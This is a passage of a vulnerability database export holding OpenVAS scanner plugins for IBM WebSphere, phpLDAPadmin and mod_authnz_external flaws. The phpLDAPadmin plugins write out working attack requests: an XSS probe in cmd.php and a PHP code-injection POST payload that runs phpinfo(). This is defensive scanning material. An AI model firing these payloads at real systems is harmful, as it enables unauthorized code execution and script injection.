6.1.0.41,\n 7.0 before 7.0.0.19 and 8.0 before 8.0.0.1\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in administration console which fails to\n handle certain requests. This allows remote attackers to read arbitrary files via a '../' (dot dot) in the URI.\");\n\n script_tag(name:\"solution\", value:\"Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or\n 8.0.0.1\");\n\n script_tag(name:\"summary\", value:\"The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(!vers = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\nif(version_is_equal(version:vers, test_version:\"8.0.0.0\") ||\n version_in_range(version:vers, test_version:\"6.1\", test_version2:\"6.1.0.40\") ||\n version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.0.18\")){\n report = report_fixed_ver(installed_version:vers, fixed_version:\"6.1.0.41/7.0.0.19\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:32:54", "description": "This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "phpLDAPadmin '_debug' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310802265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpLDAPadmin '_debug' Cross Site 
Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802265\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_cve_id(\"CVE-2011-4074\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;a=commit;h=64668e882b8866fae0fa1b25375d1a2f3b4672e2\");\n script_xref(name:\"URL\", 
value:\"http://secunia.com/advisories/46551\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70918\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2011/10/24/9\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748538\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"phpLDAPadmin versions 1.2.0 through 1.2.1.1\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to improper validation of user-supplied input appended\n to the URL in cmd.php (when 'cmd' is set to '_debug'), which allows attackers to execute arbitrary HTML\n and script code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more info.\");\n\n script_tag(name:\"summary\", value:\"This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:phpldapadmin:phpldapadmin\";\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\nif(dir == \"/\") dir = \"\";\n\nreq = http_get(item:string(dir, \"/index.php\"), port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\nurl = \"/cmd.php?cmd=_debug&<script>alert('OV-XSS-Attack-Test')</script>\";\nreq = http_get(item:dir + url, port:port);\nreq = string(chomp(req), '\\r\\nCookie: ', 
cookie, '\\r\\n\\r\\n');\n\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res =~ \"^HTTP/1\\.[01] 200\" && \"<script>alert('OV-XSS-Attack-Test')</script>\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:13:41", "description": "This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "phpLDAPadmin '_debug' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074"], "modified": "2017-03-30T00:00:00", "id": "OPENVAS:802265", "href": "http://plugins.openvas.org/nasl.php?oid=802265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_debug_xss_vuln.nasl 5793 2017-03-30 13:40:15Z cfi $\n#\n# phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the\n context of an affected site.\n Impact Level: Application\";\ntag_affected = \"phpLDAPadmin versions 1.2.0 through 1.2.1.1\";\ntag_insight = \"The flaw is due to improper validation of user-supplied input appended\n to the URL in cmd.php (when 'cmd' is set to '_debug'), which allows attackers\n to execute arbitrary HTML and script code in a user's browser session in the\n context of an affected site.\";\ntag_solution = \"Apply patch from below link,\n http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;a=commit;h=64668e882b8866fae0fa1b25375d1a2f3b4672e2\";\ntag_summary = \"This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.\";\n\nif(description)\n{\n script_id(802265);\n script_version(\"$Revision: 5793 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-30 15:40:15 +0200 (Thu, 30 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_cve_id(\"CVE-2011-4074\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46551\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/70918\");\n script_xref(name : \"URL\" , value : 
\"http://openwall.com/lists/oss-security/2011/10/24/9\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=748538\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\n## Get phpLDAPadmin Directory\nif(! dir = get_dir_from_kb(port:port,app:\"phpldapadmin\")){\n exit(0);\n}\n\nif( dir == \"/\" ) dir = \"\";\n\nreq = http_get(item:string(dir, \"/index.php\"), port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Get Session ID\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\n## Construct attack request\nurl = \"/cmd.php?cmd=_debug&<script>alert('OV-XSS-Attack-Test')</script>\";\nreq = http_get(item:dir + url, port:port);\nreq = string(chomp(req), '\\r\\nCookie: ', cookie, '\\r\\n\\r\\n');\n\n## Send request and receive the response\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm exploit worked by checking the response\nif(res =~ \"HTTP/1\\.. 
200\" && \"<script>alert('OV-XSS-Attack-Test')</script>\" >< res){\n security_message(port);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:58", "description": "phpLDAPadmin is prone to a remote PHP code-injection vulnerability.", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "openvas", "title": "phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310103314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103314", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_50331.nasl 11826 2018-10-10 14:38:27Z cfischer $\n#\n# phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103314\");\n script_version(\"$Revision: 11826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 16:38:27 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-25 16:57:43 +0200 (Tue, 25 Oct 2011)\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\");\n script_name(\"phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50331\");\n script_xref(name:\"URL\", value:\"http://phpldapadmin.sourceforge.net/\");\n\n script_tag(name:\"summary\", value:\"phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to inject and execute arbitrary PHP\n code in the context of the affected application. This may facilitate a compromise of the application and\n the underlying system. 
Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"phpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:phpldapadmin:phpldapadmin\";\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\nif(dir == \"/\") dir = \"\";\n\nurl = string(dir, \"/index.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif( buf == NULL ) exit(0);\n\nsession_id = eregmatch(pattern:\"Set-Cookie: ([^;]*);\",string:buf);\nif(isnull(session_id[1]))exit(0);\nsess = session_id[1];\n\nhost = http_host_name(port:port);\npayload = \"cmd=query_engine&query=none&search=1&orderby=foo));}}phpinfo();die;/*\";\n\nreq = string(\n\t \"POST \", dir , \"/cmd.php HTTP/1.1\\r\\n\",\n \"Host: \", host,\"\\r\\n\",\n \"Cookie: \", sess, \"\\r\\n\",\n\t \"Content-Length: \", strlen(payload),\"\\r\\n\",\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n\t \"Connection: close\\r\\n\",\n\t \"\\r\\n\",\n\t payload\n\t );\nres = http_send_recv(port:port, data:req);\n\nif(\"<title>phpinfo()\" >< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-04T14:19:55", "description": "phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\n\nAn attacker can exploit this issue to inject and execute arbitrary PHP\ncode in the context of the affected application. 
This may facilitate a\ncompromise of the application and the underlying system; other attacks\nare also possible.\n\nphpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "openvas", "title": "phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2017-08-28T00:00:00", "id": "OPENVAS:103314", "href": "http://plugins.openvas.org/nasl.php?oid=103314", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_50331.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\n\nAn attacker can exploit this issue to inject and execute arbitrary PHP\ncode in the context of the affected application. 
This may facilitate a\ncompromise of the application and the underlying system; other attacks\nare also possible.\n\nphpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.\";\n\n\nif (description)\n{\n script_id(103314);\n script_version(\"$Revision: 7015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-25 16:57:43 +0200 (Tue, 25 Oct 2011)\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\");\n script_name(\"phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/50331\");\n script_xref(name : \"URL\" , value : \"http://phpldapadmin.sourceforge.net/\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n \nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nif(! 
dir = get_dir_from_kb(port:port,app:\"phpldapadmin\"))exit(0);\n\nurl = string(dir, \"/index.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif( buf == NULL ) exit(0);\n\nsession_id = eregmatch(pattern:\"Set-Cookie: ([^;]*);\",string:buf);\nif(isnull(session_id[1]))exit(0);\nsess = session_id[1];\n\nhost = get_host_name();\npayload = \"cmd=query_engine&query=none&search=1&orderby=foo));}}phpinfo();die;/*\";\n\nreq = string(\n\t \"POST \", dir , \"/cmd.php HTTP/1.1\\r\\n\",\n \"Host: \", host,\"\\r\\n\",\n \"Cookie: \", sess, \"\\r\\n\",\n\t \"Content-Length: \", strlen(payload),\"\\r\\n\",\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n\t \"Connection: close\\r\\n\",\n\t \"\\r\\n\",\n\t payload\n\t );\n\nres = http_send_recv(port:port, data:req);\n\nif(\"<title>phpinfo()\" >< res) {\n security_message(port:port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:38", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-23.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070786", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_23.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70786\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2688\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"An input sanitation flaw in mod_authnz_external allows remote\n attacker to conduct SQL injection.\");\n script_tag(name:\"solution\", value:\"All Apache mod_authnz_external users should upgrade to the latest\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apache/mod_authnz_external-3.2.6'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-23\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=386165\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-23.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-apache/mod_authnz_external\", unaffected: make_list(\"ge 3.2.6\"), vulnerable: make_list(\"lt 3.2.6\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:33", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-23.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70786", "href": "http://plugins.openvas.org/nasl.php?oid=70786", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML 
based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An input sanitation flaw in mod_authnz_external allows remote\n attacker to conduct SQL injection.\";\ntag_solution = \"All Apache mod_authnz_external users should upgrade to the latest\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apache/mod_authnz_external-3.2.6'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=386165\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-23.\";\n\n \n \nif(description)\n{\n script_id(70786);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2688\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 
Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-apache/mod_authnz_external\", unaffected: make_list(\"ge 3.2.6\"), vulnerable: make_list(\"lt 3.2.6\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:35", "description": "The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69988", "href": "http://plugins.openvas.org/nasl.php?oid=69988", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2279_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2279-1 (libapache2-mod-authnz-external)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\";\ntag_summary = \"The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202279-1\";\n\n\nif(description)\n{\n script_id(69988);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) 